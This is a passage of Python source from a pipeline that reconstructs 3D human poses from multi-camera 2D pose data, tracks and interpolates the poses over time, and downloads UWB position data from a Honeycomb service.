pipeline_stage='pose_reconstruction_3d',
environment_id=environment_id,
filename_stem='pose_reconstruction_3d_metadata',
inference_id=pose_reconstruction_3d_metadata['inference_id'],
time_segment_start=None,
object_type='dict',
append=False,
sort_field=None,
pose_processing_subdirectory=pose_processing_subdirectory
)
logger.info('Generating list of time segments')
time_segment_start_list = process_pose_data.local_io.generate_time_segment_start_list(
start=start,
end=end
)
num_time_segments = len(time_segment_start_list)
num_minutes = (end - start).total_seconds()/60
logger.info('Reconstructing 3D poses for {} time segments spanning {:.3f} minutes: {} to {}'.format(
num_time_segments,
num_minutes,
time_segment_start_list[0].isoformat(),
time_segment_start_list[-1].isoformat()
))
reconstruct_poses_3d_alphapose_local_time_segment_partial = functools.partial(
reconstruct_poses_3d_alphapose_local_time_segment,
base_dir=base_dir,
environment_id=environment_id,
pose_extraction_2d_inference_id=pose_extraction_2d_inference_id,
pose_reconstruction_3d_inference_id=inference_id,
pose_processing_subdirectory=pose_processing_subdirectory,
camera_device_id_lookup=camera_device_id_lookup,
client=None,
uri=None,
token_uri=None,
audience=None,
client_id=None,
client_secret=None,
camera_calibrations=camera_calibrations,
min_keypoint_quality=min_keypoint_quality,
min_num_keypoints=min_num_keypoints,
min_pose_quality=min_pose_quality,
min_pose_pair_score=min_pose_pair_score,
max_pose_pair_score=max_pose_pair_score,
pose_pair_score_distance_method=pose_pair_score_distance_method,
pose_pair_score_pixel_distance_scale=pose_pair_score_pixel_distance_scale,
pose_pair_score_summary_method=pose_pair_score_summary_method,
pose_3d_limits=pose_3d_limits,
room_x_limits=room_x_limits,
room_y_limits=room_y_limits,
pose_3d_graph_initial_edge_threshold=pose_3d_graph_initial_edge_threshold,
pose_3d_graph_max_dispersion=pose_3d_graph_max_dispersion,
include_track_labels=include_track_labels,
progress_bar=segment_progress_bar,
notebook=notebook
)
if (task_progress_bar or segment_progress_bar) and parallel and not notebook:
logger.warning('Progress bars may not display properly with parallel processing enabled outside of a notebook')
processing_start = time.time()
if parallel:
logger.info('Attempting to launch parallel processes')
if num_parallel_processes is None:
num_cpus=multiprocessing.cpu_count()
num_processes = num_cpus - 1
logger.info('Number of parallel processes not specified. {} CPUs detected. Launching {} processes'.format(
num_cpus,
num_processes
))
with multiprocessing.Pool(num_processes) as p:
if task_progress_bar:
if notebook:
list(tqdm.notebook.tqdm(
p.imap_unordered(
reconstruct_poses_3d_alphapose_local_time_segment_partial,
time_segment_start_list
),
total=len(time_segment_start_list)
))
else:
list(tqdm.tqdm(
p.imap_unordered(
reconstruct_poses_3d_alphapose_local_time_segment_partial,
time_segment_start_list
),
total=len(time_segment_start_list)
))
else:
list(
p.imap_unordered(
reconstruct_poses_3d_alphapose_local_time_segment_partial,
time_segment_start_list
)
)
else:
if task_progress_bar:
if notebook:
list(map(reconstruct_poses_3d_alphapose_local_time_segment_partial, tqdm.notebook.tqdm(time_segment_start_list)))
else:
list(map(reconstruct_poses_3d_alphapose_local_time_segment_partial, tqdm.tqdm(time_segment_start_list)))
else:
list(map(reconstruct_poses_3d_alphapose_local_time_segment_partial, time_segment_start_list))
processing_time = time.time() - processing_start
logger.info('Processed {:.3f} minutes of 2D poses in {:.3f} minutes (ratio of {:.3f})'.format(
num_minutes,
processing_time/60,
(processing_time/60)/num_minutes
))
return inference_id
def reconstruct_poses_3d_local_timestamp(
timestamp,
base_dir,
environment_id,
pose_extraction_2d_inference_id,
pose_model_id,
room_x_limits,
room_y_limits,
camera_assignment_ids=None,
camera_device_id_lookup=None,
camera_calibrations=None,
coordinate_space_id=None,
client=None,
uri=None,
token_uri=None,
audience=None,
client_id=None,
client_secret=None,
pose_processing_subdirectory='pose_processing',
min_keypoint_quality=None,
min_num_keypoints=None,
min_pose_quality=None,
min_pose_pair_score=None,
max_pose_pair_score=25.0,
pose_pair_score_distance_method='pixels',
pose_pair_score_pixel_distance_scale=5.0,
pose_pair_score_summary_method='rms',
pose_3d_limits=None,
pose_3d_graph_initial_edge_threshold=2,
pose_3d_graph_max_dispersion=0.20,
include_track_labels=False,
return_diagnostics=False
):
if timestamp.tzinfo is None:
logger.info('Specified timestamp is timezone-naive. Assuming UTC')
timestamp=timestamp.replace(tzinfo=datetime.timezone.utc)
logger.info('Reconstructing 3D poses from local 2D pose data. Base directory: {}. Pose processing data subdirectory: {}. Environment ID: {}. Timestamp: {}'.format(
base_dir,
pose_processing_subdirectory,
environment_id,
timestamp
))
if camera_assignment_ids is None:
logger.info('Camera assignment IDs not specified. Fetching camera assignment IDs from Honeycomb based on environmen and time span')
camera_assignment_ids = honeycomb_io.fetch_camera_assignment_ids_from_environment(
start=timestamp,
end=timestamp,
environment_id=environment_id,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
if camera_device_id_lookup is None:
logger.info('Camera device ID lookup table not specified. Fetching camera device ID info from Honeycomb based on camera assignment IDs')
camera_device_id_lookup = honeycomb_io.fetch_camera_device_id_lookup(
assignment_ids=camera_assignment_ids,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
camera_device_ids = list(camera_device_id_lookup.values())
if camera_calibrations is None:
logger.info('Camera calibration parameters not specified. Fetching camera calibration parameters from Honeycomb based on camera device IDs and time span')
camera_calibrations = honeycomb_io.fetch_camera_calibrations(
camera_ids=camera_device_ids,
start=timestamp,
end=timestamp,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
if coordinate_space_id is None:
coordinate_space_id = extract_coordinate_space_id_from_camera_calibrations(camera_calibrations)
if pose_3d_limits is None:
logger.info('3D pose spatial limits not specified. Generating default spatial limits based on specified room spatial limits and specified pose model')
pose_3d_limits = generate_pose_3d_limits(
pose_model_id=pose_model_id,
room_x_limits=room_x_limits,
room_y_limits=room_y_limits,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
time_segment_start_list = process_pose_data.local_io.generate_time_segment_start_list(
start=timestamp,
end=timestamp
)
if len(time_segment_start_list) != 1:
raise ValueError('Processing single timestamp but generated time segment start list of length {}'.format(
len(time_segment_start_list)
))
time_segment_start = time_segment_start_list[0]
logger.info('Processing 2D poses from local Alphapose output files for time segment starting at {}'.format(time_segment_start.isoformat()))
logger.info('Fetching 2D pose data for time segment starting at {}'.format(time_segment_start.isoformat()))
poses_2d_df_time_segment = process_pose_data.local_io.fetch_data_local(
base_dir=base_dir,
pipeline_stage='pose_extraction_2d',
environment_id=environment_id,
filename_stem='poses_2d',
inference_ids=pose_extraction_2d_inference_id,
data_ids=None,
sort_field=None,
time_segment_start=time_segment_start,
object_type='dataframe',
pose_processing_subdirectory=pose_processing_subdirectory
)
if len(poses_2d_df_time_segment) == 0:
logger.info('No 2D poses found for time segment starting at %s', time_segment_start.isoformat())
return
logger.info('Fetched 2D pose data for time segment starting at {}'.format(time_segment_start.isoformat()))
logger.info('Extracting 2D pose data for timestamp {}'.format(timestamp.isoformat()))
poses_2d_df_timestamp = poses_2d_df_time_segment.loc[poses_2d_df_time_segment['timestamp'] == timestamp].copy()
if len(poses_2d_df_timestamp) == 0:
logger.info('No 2D poses found for timestamp %s', timestamp.isoformat())
return
logger.info('Converting camera assignment IDs to camera device IDs for timestamp {}'.format(timestamp.isoformat()))
poses_2d_df_timestamp = process_pose_data.local_io.convert_assignment_ids_to_camera_device_ids(
poses_2d_df=poses_2d_df_timestamp,
camera_device_id_lookup=camera_device_id_lookup,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
logger.info('Converted camera assignment IDs to camera device IDs for timestamp {}'.format(timestamp.isoformat()))
camera_ids_in_data = poses_2d_df_timestamp['camera_id'].unique().tolist()
missing_cameras = list()
for camera_id in camera_ids_in_data:
for calibration_parameter in [
'camera_matrix',
'distortion_coefficients',
'rotation_vector',
'translation_vector'
]:
if camera_calibrations.get(camera_id, {}).get(calibration_parameter) is None:
logger.warning('Camera {} in data is missing calibration information. Excluding these poses.'.format(
camera_id
))
missing_cameras.append(camera_id)
break
if len(missing_cameras) > 0:
poses_2d_df_timestamp = poses_2d_df_timestamp.loc[~poses_2d_df_timestamp['camera_id'].isin(missing_cameras)]
poses_3d_df_timestamp = poseconnect.reconstruct.reconstruct_poses_3d_timestamp(
poses_2d_timestamp=poses_2d_df_timestamp,
camera_calibrations=camera_calibrations,
pose_3d_limits=pose_3d_limits,
min_keypoint_quality=min_keypoint_quality,
min_num_keypoints=min_num_keypoints,
min_pose_quality=min_pose_quality,
min_pose_pair_score=min_pose_pair_score,
max_pose_pair_score=max_pose_pair_score,
pose_pair_score_distance_method=pose_pair_score_distance_method,
pose_pair_score_pixel_distance_scale=pose_pair_score_pixel_distance_scale,
pose_pair_score_summary_method=pose_pair_score_summary_method,
pose_3d_graph_initial_edge_threshold=pose_3d_graph_initial_edge_threshold,
pose_3d_graph_max_dispersion=pose_3d_graph_max_dispersion,
include_track_labels=include_track_labels,
return_diagnostics=return_diagnostics
)
return poses_3d_df_timestamp
def reconstruct_poses_3d_alphapose_local_time_segment(
time_segment_start,
base_dir,
environment_id,
pose_extraction_2d_inference_id,
pose_reconstruction_3d_inference_id,
pose_processing_subdirectory='pose_processing',
camera_device_id_lookup=None,
client=None,
uri=None,
token_uri=None,
audience=None,
client_id=None,
client_secret=None,
camera_calibrations=None,
min_keypoint_quality=None,
min_num_keypoints=None,
min_pose_quality=None,
min_pose_pair_score=None,
max_pose_pair_score=25.0,
pose_pair_score_distance_method='pixels',
pose_pair_score_pixel_distance_scale=5.0,
pose_pair_score_summary_method='rms',
pose_3d_limits=None,
room_x_limits=None,
room_y_limits=None,
pose_3d_graph_initial_edge_threshold=2,
pose_3d_graph_max_dispersion=0.20,
include_track_labels=False,
progress_bar=False,
notebook=False
):
logger.info('Processing 2D poses from local Alphapose output files for time segment starting at {}'.format(time_segment_start.isoformat()))
logger.info('Fetching 2D pose data for time segment starting at {}'.format(time_segment_start.isoformat()))
poses_2d_df_time_segment = process_pose_data.local_io.fetch_data_local(
base_dir=base_dir,
pipeline_stage='pose_extraction_2d',
environment_id=environment_id,
filename_stem='poses_2d',
inference_ids=pose_extraction_2d_inference_id,
data_ids=None,
sort_field=None,
time_segment_start=time_segment_start,
object_type='dataframe',
pose_processing_subdirectory=pose_processing_subdirectory
)
if len(poses_2d_df_time_segment) == 0:
logger.info('No 2D poses found for time segment starting at %s', time_segment_start.isoformat())
return
logger.info('Fetched 2D pose data for time segment starting at {}'.format(time_segment_start.isoformat()))
if poses_2d_df_time_segment['timestamp'].min() < time_segment_start:
raise ValueError('First timestamp in 2D pose data for time segment starting at {} is {}, which is before start of time segment'.format(
time_segment_start.isoformat(),
poses_2d_df_time_segment['timestamp'].min().isoformat()
))
if poses_2d_df_time_segment['timestamp'].max() >= time_segment_start + datetime.timedelta(seconds=10):
raise ValueError('Last timestamp in 2D pose data for time segment starting at {} is {}, which is after end of time segment'.format(
time_segment_start.isoformat(),
poses_2d_df_time_segment['timestamp'].max().isoformat()
))
logger.info('Converting camera assignment IDs to camera device IDs for time segment starting at {}'.format(time_segment_start.isoformat()))
poses_2d_df_time_segment = process_pose_data.local_io.convert_assignment_ids_to_camera_device_ids(
poses_2d_df=poses_2d_df_time_segment,
camera_device_id_lookup=camera_device_id_lookup,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
logger.info('Converted camera assignment IDs to camera device IDs for time segment starting at {}'.format(time_segment_start.isoformat()))
logger.info('Reconstructing 3D poses for time segment starting at {}'.format(time_segment_start.isoformat()))
poses_3d_df = poseconnect.reconstruct.reconstruct_poses_3d(
poses_2d=poses_2d_df_time_segment,
pose_3d_limits=pose_3d_limits,
pose_model_name=None,
room_x_limits=room_x_limits,
room_y_limits=room_y_limits,
camera_calibrations=camera_calibrations,
min_keypoint_quality=min_keypoint_quality,
min_num_keypoints=min_num_keypoints,
min_pose_quality=min_pose_quality,
min_pose_pair_score=min_pose_pair_score,
max_pose_pair_score=max_pose_pair_score,
pose_pair_score_distance_method=pose_pair_score_distance_method,
pose_pair_score_pixel_distance_scale=pose_pair_score_pixel_distance_scale,
pose_pair_score_summary_method=pose_pair_score_summary_method,
pose_3d_graph_initial_edge_threshold=pose_3d_graph_initial_edge_threshold,
pose_3d_graph_max_dispersion=pose_3d_graph_max_dispersion,
include_track_labels=include_track_labels,
progress_bar=progress_bar,
notebook=notebook
)
logger.info('Reconstructed 3D poses for time segment starting at {}'.format(time_segment_start.isoformat()))
logger.info('Writing 3D poses to disk for time segment starting at {}'.format(time_segment_start.isoformat()))
process_pose_data.local_io.write_data_local(
data_object=poses_3d_df,
base_dir=base_dir,
pipeline_stage='pose_reconstruction_3d',
environment_id=environment_id,
filename_stem='poses_3d',
inference_id=pose_reconstruction_3d_inference_id,
time_segment_start=time_segment_start,
object_type='dataframe',
append=False,
sort_field=None,
pose_processing_subdirectory=pose_processing_subdirectory
)
def generate_pose_tracks_3d_local_by_time_segment(
base_dir,
environment_id,
pose_reconstruction_3d_inference_id,
start=None,
end=None,
max_match_distance=1.0,
max_iterations_since_last_match=20,
centroid_position_initial_sd=1.0,
centroid_velocity_initial_sd=1.0,
reference_delta_t_seconds=1.0,
reference_velocity_drift=0.30,
position_observation_sd=0.5,
num_poses_per_track_min=11,
pose_processing_subdirectory='pose_processing',
task_progress_bar=False,
notebook=False
):
"""
Fetches 3D pose data from local files, assembles them into pose tracks, and writes output back to local files.
Input data is assumed to be organized as specified by output of
reconstruct_poses_3d_local_by_time_segment().
Output data is saved as
\'BASE_DIR/POSE_PROCESSING_SUBDIRECTORY/pose_tracking_3d/ENVIRONMENT_ID/pose_tracks_3d_INFERENCE_ID.pkl\'
Output metadata is saved as
\'BASE_DIR/POSE_PROCESSING_SUBDIRECTORY/pose_tracking_3d/ENVIRONMENT_ID/pose_tracking_3d_metadata_INFERENCE_ID.pkl\'
Args:
base_dir: Base directory for local data (e.g., \'/data\')
environment_id (str): Honeycomb environment ID for source environment
pose_reconstruction_3d_inference_id (str): Inference ID for source data
start (datetime): Start of period within source data to be analyzed (default is None)
end (datetime): End of period within source data to be analyzed (default is None)
max_match_distance (float): Maximum distance between 3D pose and predicted pose track for pose to be added to track (default is 1.0)
max_iterations_since_last_match (int): Maximum number of unmatched iterations before pose track is terminated (default is 20)
centroid_position_initial_sd (float): Initial standard deviation for pose track centroid position (default is 1.0)
centroid_velocity_initial_sd (float): Initial standard deviation for pose track centroid velocity (default is 1.0)
reference_delta_t_seconds (float): Reference time period for specifying velocity drift (default is 1.0)
reference_velocity_drift (float): Reference velocity drift (default is 0.30)
position_observation_sd (float): Position observation error (reference is 0.5)
num_poses_per_track_min (it): Mininum number of poses in a track (default is 11)
pose_processing_subdirectory (str): subdirectory (under base directory) for all pose processing data (default is \'pose_processing\')
task_progress_bar (bool): Boolean indicating whether script should display an overall progress bar (default is False)
notebook (bool): Boolean indicating whether script is being run in a Jupyter notebook (for progress bar display) (default is False)
Returns:
(str) Locally-generated inference ID for this run (identifies output data)
"""
pose_reconstruction_3d_metadata = process_pose_data.local_io.fetch_data_local(
base_dir=base_dir,
pipeline_stage='pose_reconstruction_3d',
environment_id=environment_id,
filename_stem='pose_reconstruction_3d_metadata',
inference_ids=pose_reconstruction_3d_inference_id,
data_ids=None,
sort_field=None,
time_segment_start=None,
object_type='dict',
pose_processing_subdirectory=pose_processing_subdirectory
)
if start is None:
start = pose_reconstruction_3d_metadata['parameters']['start']
if end is None:
end = pose_reconstruction_3d_metadata['parameters']['end']
if start.tzinfo is None:
logger.info('Specified start is timezone-naive. Assuming UTC')
start=start.replace(tzinfo=datetime.timezone.utc)
if end.tzinfo is None:
logger.info('Specified end is timezone-naive. Assuming UTC')
end=end.replace(tzinfo=datetime.timezone.utc)
logger.info('Generating 3D pose tracks from local 3D pose data. Base directory: {}. Pose processing data subdirectory: {}. Environment ID: {}. Start: {}. End: {}'.format(
base_dir,
pose_processing_subdirectory,
environment_id,
start,
end
))
logger.info('Generating metadata')
pose_tracking_3d_metadata = generate_metadata(
environment_id=environment_id,
pipeline_stage='pose_tracking_3d',
parameters={
'pose_reconstruction_3d_inference_id': pose_reconstruction_3d_inference_id,
'start': start,
'end': end,
'max_match_distance': max_match_distance,
'max_iterations_since_last_match': max_iterations_since_last_match,
'centroid_position_initial_sd': centroid_position_initial_sd,
'centroid_velocity_initial_sd': None,
'reference_delta_t_seconds': reference_delta_t_seconds,
'reference_velocity_drift': reference_velocity_drift,
'position_observation_sd': position_observation_sd,
'num_poses_per_track_min': num_poses_per_track_min
}
)
pose_tracking_3d_inference_id = pose_tracking_3d_metadata.get('inference_id')
logger.info('Writing inference metadata to local file')
process_pose_data.local_io.write_data_local(
data_object=pose_tracking_3d_metadata,
base_dir=base_dir,
pipeline_stage='pose_tracking_3d',
environment_id=environment_id,
filename_stem='pose_tracking_3d_metadata',
inference_id=pose_tracking_3d_metadata['inference_id'],
time_segment_start=None,
object_type='dict',
append=False,
sort_field=None,
pose_processing_subdirectory=pose_processing_subdirectory
)
logger.info('Generating list of time segments')
time_segment_start_list = process_pose_data.local_io.generate_time_segment_start_list(
start=start,
end=end
)
num_time_segments = len(time_segment_start_list)
num_minutes = (end - start).total_seconds()/60
logger.info('Tracking 3D poses for {} time segments spanning {:.3f} minutes: {} to {}'.format(
num_time_segments,
num_minutes,
time_segment_start_list[0].isoformat(),
time_segment_start_list[-1].isoformat()
))
processing_start = time.time()
pose_tracks_3d = None
if task_progress_bar:
if notebook:
time_segment_start_iterator = tqdm.notebook.tqdm(time_segment_start_list)
else:
time_segment_start_iterator = tqdm.tqdm(time_segment_start_list)
else:
time_segment_start_iterator = time_segment_start_list
for time_segment_start in time_segment_start_iterator:
poses_3d_df = process_pose_data.local_io.fetch_data_local(
base_dir=base_dir,
pipeline_stage='pose_reconstruction_3d',
environment_id=environment_id,
filename_stem='poses_3d',
inference_ids=pose_reconstruction_3d_inference_id,
data_ids=None,
sort_field=None,
time_segment_start=time_segment_start,
object_type='dataframe',
pose_processing_subdirectory='pose_processing'
)
if len(poses_3d_df) == 0:
continue
pose_tracks_3d = poseconnect.track.update_pose_tracks_3d(
poses_3d=poses_3d_df,
pose_tracks_3d=pose_tracks_3d,
max_match_distance=max_match_distance,
max_iterations_since_last_match=max_iterations_since_last_match,
centroid_position_initial_sd=centroid_position_initial_sd,
centroid_velocity_initial_sd=centroid_velocity_initial_sd,
reference_delta_t_seconds=reference_delta_t_seconds,
reference_velocity_drift=reference_velocity_drift,
position_observation_sd=position_observation_sd,
progress_bar=False,
notebook=False
)
if num_poses_per_track_min is not None:
pose_tracks_3d.filter(
num_poses_min=num_poses_per_track_min,
inplace=True
)
process_pose_data.local_io.write_data_local(
data_object=pose_tracks_3d.output(),
base_dir=base_dir,
pipeline_stage='pose_tracking_3d',
environment_id=environment_id,
filename_stem='pose_tracks_3d',
inference_id=pose_tracking_3d_inference_id,
time_segment_start=None,
object_type='dict',
append=False,
sort_field=None,
pose_processing_subdirectory=pose_processing_subdirectory
)
processing_time = time.time() - processing_start
logger.info('Processed {:.3f} minutes of 3D poses in {:.3f} minutes (ratio of {:.3f})'.format(
num_minutes,
processing_time/60,
(processing_time/60)/num_minutes
))
return pose_tracking_3d_inference_id
def interpolate_pose_tracks_3d_local_by_pose_track(
base_dir,
environment_id,
pose_tracking_3d_inference_id,
pose_processing_subdirectory='pose_processing',
task_progress_bar=False,
notebook=False
):
"""
Fetches 3D pose and pose track data from local files, interpolates to fill gaps in the tracks, and writes output back to local files.
Input data is assumed to be organized as specified by output of
reconstruct_poses_3d_local_by_time_segment() and
generate_pose_tracks_3d_local_by_time_segment().
The script looks up the inference ID for the 3D poses in the tracks by
inspecting the metadata from the pose tracking run.
Output data is saved as
\'BASE_DIR/POSE_PROCESSING_SUBDIRECTORY/pose_reconstruction_3d/ENVIRONMENT_ID/YYYY/MM/DD/HH-MM-SS/poses_3d_INFERENCE_ID.pkl\'
(for new poses) and
\'BASE_DIR/POSE_PROCESSING_SUBDIRECTORY/pose_tracking_3d/ENVIRONMENT_ID/pose_tracks_3d_INFERENCE_ID.pkl\'
(for new pose track data).
Output metadata is saved as
\'BASE_DIR/POSE_PROCESSING_SUBDIRECTORY/pose_track_3d_interpolation/ENVIRONMENT_ID/pose_track_3d_interpolation_metadata_INFERENCE_ID.pkl\'
Args:
base_dir: Base directory for local data (e.g., \'/data\')
environment_id (str): Honeycomb environment ID for source environment
pose_tracking_3d_inference_id (str): Inference ID for source data
pose_processing_subdirectory (str): subdirectory (under base directory) for all pose processing data (default is \'pose_processing\')
task_progress_bar (bool): Boolean indicating whether script should display an overall progress bar (default is False)
notebook (bool): Boolean indicating whether script is being run in a Jupyter notebook (for progress bar display) (default is False)
Returns:
(str) Locally-generated inference ID for this run (identifies output data)
"""
pose_tracking_3d_metadata = process_pose_data.local_io.fetch_data_local(
base_dir=base_dir,
pipeline_stage='pose_tracking_3d',
environment_id=environment_id,
filename_stem='pose_tracking_3d_metadata',
inference_ids=pose_tracking_3d_inference_id,
data_ids=None,
sort_field=None,
time_segment_start=None,
object_type='dict',
pose_processing_subdirectory=pose_processing_subdirectory
)
start = pose_tracking_3d_metadata['parameters']['start']
end = pose_tracking_3d_metadata['parameters']['end']
pose_reconstruction_3d_inference_id = pose_tracking_3d_metadata['parameters']['pose_reconstruction_3d_inference_id']
logger.info('Interpolating 3D pose tracks from local 3D pose track data and local 3D pose data. Base directory: {}. Pose processing data subdirectory: {}. Environment ID: {}.'.format(
base_dir,
pose_processing_subdirectory,
environment_id
))
logger.info('Generating metadata')
pose_track_3d_interpolation_metadata = generate_metadata(
environment_id=environment_id,
pipeline_stage='pose_track_3d_interpolation',
parameters={
'pose_reconstruction_3d_inference_id': pose_reconstruction_3d_inference_id,
'pose_tracking_3d_inference_id': pose_tracking_3d_inference_id,
'start': start,
'end': end
}
)
pose_track_3d_interpolation_inference_id = pose_track_3d_interpolation_metadata.get('inference_id')
logger.info('Writing inference metadata to local file')
process_pose_data.local_io.write_data_local(
data_object=pose_track_3d_interpolation_metadata,
base_dir=base_dir,
pipeline_stage='pose_track_3d_interpolation',
environment_id=environment_id,
filename_stem='pose_track_3d_interpolation_metadata',
inference_id=pose_track_3d_interpolation_metadata['inference_id'],
time_segment_start=None,
object_type='dict',
append=False,
sort_field=None,
pose_processing_subdirectory=pose_processing_subdirectory
)
pose_tracks_3d = process_pose_data.local_io.fetch_data_local(
base_dir=base_dir,
pipeline_stage='pose_tracking_3d',
environment_id=environment_id,
filename_stem='pose_tracks_3d',
inference_ids=pose_tracking_3d_inference_id,
data_ids=None,
sort_field=None,
time_segment_start=None,
object_type='dict',
pose_processing_subdirectory=pose_processing_subdirectory
)
num_pose_tracks = len(pose_tracks_3d)
pose_tracks_start = min([pose_track_3d['start'] for pose_track_3d in pose_tracks_3d.values()])
pose_tracks_end = max([pose_track_3d['end'] for pose_track_3d in pose_tracks_3d.values()])
num_poses = sum([len(pose_track_3d['pose_3d_ids']) for pose_track_3d in pose_tracks_3d.values()])
num_minutes = (pose_tracks_end - pose_tracks_start).total_seconds()/60
logger.info('Interpolating {} 3D pose tracks spanning {} poses and {:.3f} minutes: {} to {}'.format(
num_pose_tracks,
num_poses,
num_minutes,
pose_tracks_start.isoformat(),
pose_tracks_end.isoformat()
))
processing_start = time.time()
if task_progress_bar:
if notebook:
pose_track_iterator = tqdm.notebook.tqdm(pose_tracks_3d.items())
else:
pose_track_iterator = tqdm.tqdm(pose_tracks_3d.items())
else:
pose_track_iterator = pose_tracks_3d.items()
pose_tracks_3d_new = dict()
for pose_track_3d_id, pose_track_3d in pose_track_iterator:
pose_track_start = pose_track_3d['start']
pose_track_end = pose_track_3d['end']
pose_3d_ids = pose_track_3d['pose_3d_ids']
poses_3d_in_track_df = process_pose_data.local_io.fetch_data_local_by_time_segment(
start=pose_track_start,
end=pose_track_end,
base_dir=base_dir,
pipeline_stage='pose_reconstruction_3d',
environment_id=environment_id,
filename_stem='poses_3d',
inference_ids=pose_reconstruction_3d_inference_id,
data_ids=pose_3d_ids,
sort_field=None,
object_type='dataframe',
pose_processing_subdirectory='pose_processing'
)
poses_3d_new_df = poseconnect.track.interpolate_pose_track(
pose_track_3d=poses_3d_in_track_df
)
if len(poses_3d_new_df) == 0:
continue
process_pose_data.local_io.write_data_local_by_time_segment(
data_object=poses_3d_new_df,
base_dir=base_dir,
pipeline_stage='pose_reconstruction_3d',
environment_id=environment_id,
filename_stem='poses_3d',
inference_id=pose_track_3d_interpolation_inference_id,
object_type='dataframe',
append=True,
sort_field=None,
pose_processing_subdirectory=pose_processing_subdirectory
)
pose_tracks_3d_new[pose_track_3d_id] = {
'start': pd.to_datetime(poses_3d_new_df['timestamp'].min()).to_pydatetime(),
'end': pd.to_datetime(poses_3d_new_df['timestamp'].max()).to_pydatetime(),
'pose_3d_ids': poses_3d_new_df.index.tolist()
}
process_pose_data.local_io.write_data_local(
data_object=pose_tracks_3d_new,
base_dir=base_dir,
pipeline_stage='pose_tracking_3d',
environment_id=environment_id,
filename_stem='pose_tracks_3d',
inference_id=pose_track_3d_interpolation_inference_id,
time_segment_start=None,
object_type='dict',
append=False,
sort_field=None,
pose_processing_subdirectory=pose_processing_subdirectory
)
processing_time = time.time() - processing_start
logger.info('Processed {} 3D pose tracks in {:.3f} minutes'.format(
num_pose_tracks,
processing_time/60
))
return pose_track_3d_interpolation_inference_id
def download_position_data_by_datapoint(
start,
end,
base_dir,
environment_id,
source_objects='position_objects',
datapoint_timestamp_min=None,
datapoint_timestamp_max=None,
pose_processing_subdirectory='pose_processing',
chunk_size=100,
client=None,
uri=None,
token_uri=None,
audience=None,
client_id=None,
client_secret=None,
task_progress_bar=False,
notebook=False
):
"""
Fetches UWB position data from Honeycomb and writes it back to local files.
If source data is set to \'datapoints\', function will pull the data from
legacy datapoint objects. In this case, user must specify
\'datapoint_timestamp_min\' and \'datapoint_timestamp_max\' in addition to
\'start\' and \'end\'. Determination of minimum and maximum datapoint
timestamps for a given start and end time is tricky, because the timestamp
on a UWB datapoint typically captures when the data in that datapoint begins
but the duration of the data in that datapoint is less predictable
(typically about 30 minutes). For this reason, the script asks the user to
explicitly specify minimum and maximum datapoint timestamps rather than
calculating them from the specified start and end times. A reasonable
practice is to set the minimum datapoint timestamp to be about 40 minutes
less than the start time and to set the maximum datapoint timestamp to be
equal to the end time.
Output data is organized into 10 second segments (mirroring videos) and
saved as
\'BASE_DIR/POSE_PROCESSING_SUBDIRECTORY/download_position_data/ENVIRONMENT_ID/YYYY/MM/DD/HH-MM-SS/position_data_INFERENCE_ID.pkl\'.
Output metadata is saved as
\'BASE_DIR/POSE_PROCESSING_SUBDIRECTORY/download_position_data/ENVIRONMENT_ID/download_position_data_metadata_INFERENCE_ID.pkl\'
Args:
datapoint_timestamp_min (datetime): Minimum UWB data datapoint timestamp to fetch
datapoint_timestamp_max (datetime): Maximum UWB data datapoint timestamp to fetch
start (datetime): Start of position data to fetch
end (datetime): End of position data to fetch
base_dir: Base directory for local data (e.g., \'/data\')
environment_id (str): Honeycomb environment ID for source environment
source_objects (str): Source data in Honeycomb (either \'position_objects\' or \'datapoints\') (default is \'position_objects\')
pose_processing_subdirectory (str): subdirectory (under base directory) for all pose processing data (default is \'pose_processing\')
chunk_size (int): Maximum number of records to pull with Honeycomb request (default is 100)
client (MinimalHoneycombClient): Honeycomb client (otherwise generates one) (default is None)
uri (str): Honeycomb URI (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
token_uri (str): Honeycomb token URI (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
audience (str): Honeycomb audience (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
client_id (str): Honeycomb client ID (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
client_secret (str): Honeycomb client secret (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
task_progress_bar (bool): Boolean indicating whether script should display an overall progress bar (default is False)
notebook (bool): Boolean indicating whether script is being run in a Jupyter notebook (for progress bar display) (default is False)
Returns:
(str) Locally-generated inference ID for this run (identifies output data)
"""
if start.tzinfo is None:
logger.info('Specified start is timezone-naive. Assuming UTC')
start=start.replace(tzinfo=datetime.timezone.utc)
if end.tzinfo is None:
logger.info('Specified end is timezone-naive. Assuming UTC')
end=end.replace(tzinfo=datetime.timezone.utc)
if datapoint_timestamp_min is not None and datapoint_timestamp_min.tzinfo is None:
logger.info('Specified minimum datapoint timestamp is timezone-naive. Assuming UTC')
datapoint_timestamp_min=datapoint_timestamp_min.replace(tzinfo=datetime.timezone.utc)
if datapoint_timestamp_max is not None and datapoint_timestamp_max.tzinfo is None:
logger.info('Specified maximum datapoint timestamp is timezone-naive. Assuming UTC')
datapoint_timestamp_max=datapoint_timestamp_max.replace(tzinfo=datetime.timezone.utc)
logger.info('Downloading person position data from Honeycomb. Base directory: {}. Pose processing data subdirectory: {}. Environment ID: {}. Start: {}. End: {}'.format(
base_dir,
pose_processing_subdirectory,
environment_id,
start,
end
))
processing_start = time.time()
logger.info('Generating metadata')
download_position_data_metadata = generate_metadata(
environment_id=environment_id,
pipeline_stage='download_position_data',
parameters={
'datapoint_timestamp_min': datapoint_timestamp_min,
'datapoint_timestamp_max': datapoint_timestamp_max,
'start': start,
'end': end
}
)
download_position_data_inference_id = download_position_data_metadata.get('inference_id')
logger.info('Writing inference metadata to local file')
process_pose_data.local_io.write_data_local(
data_object=download_position_data_metadata,
base_dir=base_dir,
pipeline_stage='download_position_data',
environment_id=environment_id,
filename_stem='download_position_data_metadata',
inference_id=download_position_data_metadata['inference_id'],
time_segment_start=None,
object_type='dict',
append=False,
sort_field=None,
